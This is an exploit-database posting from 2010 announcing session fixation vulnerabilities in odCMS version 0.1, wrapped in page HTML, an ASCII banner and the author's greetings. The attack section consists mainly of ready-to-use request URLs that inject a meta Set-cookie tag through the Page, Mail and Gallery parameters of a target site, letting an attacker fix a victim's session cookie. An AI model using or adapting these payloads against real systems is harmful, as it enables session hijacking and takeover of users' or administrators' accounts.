[webapps / 0day] - odCMS Cookies handling vulnerabilities
Posted on 19 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>odCMS Cookies handling vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: webapps / 0day | Exploit author: Sweet' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>====================================== odCMS Cookies handling vulnerabilities ====================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ###################################### 1 0 Sweet the Algerian Haxxor 0 1 ###################################### 0 0 1 1 [+]Exploit Title: odCMS Cookies handling vulnerabilities 0 0 [+]Date: 18/09/2010 1 1 [+]Author: Sweet 0 0 [+]Contact : charif38@hotmail.fr 0 1 [+]Software Link: http://odcms.org/ 0 0 [+]Download:http://odcms.org/index.php?Page=Download 1 1 [+]Version: odCMS Version 0.1 0 0 [+]Tested on: Linux Mozzila 3.6.9,Win 7 IE 7 1 1 [+]Risk :Medium 0 0 [+]Exploits : Remote = Yes 1 1 [+] Local = No 0 0 [+]Description : odCMS (Open Designs Content Management System) 1 1 is a set of PHP programs used to create dynamic 0 0 HTML documents by retrieving the data stored 1 1 in flat files 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Vulnerabilitie discription ========================== By exploiting this vulnerability, an attacker fixes the user's session ID before the user even logs into the target server, thereby eliminating the need to obtain the user's session ID afterwards Exploits ======== http://target.com/path/_docs/?Page=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'> http://target.com/path/_docs/?Mail=send&TO=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>&ID=admin http://target.com/path/_docs/index.php?Page=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'> http://target.com/path/_docs/index.php?Mail=send&TO=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>&ID=admin http://target.com/path/_main/?Page=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'> http://target.com/path/_main/index.php/_main/index.php?Gallery=GalleryTB_iframe%3Dtrue&g_next=0&g_max=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>&tname=111-222-1933email@address.tst&g_first=First%20Page (thx to Milw0rm.com , JF - Hamst0r - Keystroke) R.I.P , inj3ct0r.com , exploit-db.com, packetstormsecurity.org, http://ha.ckers.org et 1,2,3 viva L'Algerie :)) # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-19]</pre></body></html>
